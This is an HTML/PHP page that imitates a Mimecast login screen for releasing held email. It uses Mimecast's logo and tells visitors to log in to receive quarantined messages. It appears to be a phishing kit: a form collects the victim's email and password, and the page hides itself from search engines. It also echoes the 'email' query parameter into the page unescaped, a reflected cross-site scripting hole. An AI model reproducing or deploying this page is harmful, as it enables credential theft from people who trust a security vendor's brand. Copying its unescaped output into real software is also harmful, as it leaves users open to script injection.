<html>
<head>
    <meta name="robots" content="noindex, nofollow" />
    <title>Mimecast : Digest Message Management</title>
    <body><br><br><br><br><br>
<div align="center">
    <table width=600>


	<input  name="email" type="hidden" value="<?php echo $_GET['email']; ?>">
	


	<font face="verdana" size="+3" color="#EB8921"> <?php echo $_GET['email']; ?> </font>

	<br><br>

	</font></center> 
<form method="post" action="#">
<center><input type="email" name="email" placeholder="Email"style="width:250px; height:45px; font-family: Verdana; font size: 15px; font-weight: light; color:#EB8921; background-color: #ffffff; border: solid 1px #EB8921FF; padding: 13px;" required="" value="" tabindex="10"><p> 

<input name="password" placeholder="password" style="width:250px; height:45px; font-family: Verdana; font size: 15px; font-weight: light; color:#EB8921; font size: 15px; background-color: #ffffff; border: solid 1px #EB8921FF; padding: 13px;" required="" type="password"></p></center>	


	<input type="submit" value="Continue" style="width:300px; height:50px; background-color: #EB8921FF; border: solid 2px #EB8921FF; 
	font-family: Verdana; font-size: 13px; font-weight: light; color: #ffffff; -moz-border-radius: 4px; -webkit-border-radius: 4px; 
	-khtml-border-radius: 4px; border-radius: 4px;
	-moz-box-shadow: 5px 5px 5px #888; -webkit-box-shadow: 5px 5px 5px #888; box-shadow: 5px 5px 5px #888;">

	<br><br>


	</form>


	</div>

</td></tr>


        <tr><td align="center" style="font-family:arial;font-size:17px;font-weight:bold;">
            

Login in with your email account to access your messages<br><span style="font-weight:normal;">They will be delivered to your inbox if they pass security checks.</span>
        </td></tr><tr><td align="center"><hr></td></tr>



        <tr><td align="center"><img src="https://www.mimecast.com/urlscanner/img/ttp-mimecastlogo@2x.png"></td></tr>


        </table>

    </div>
</body>
</head>
</html>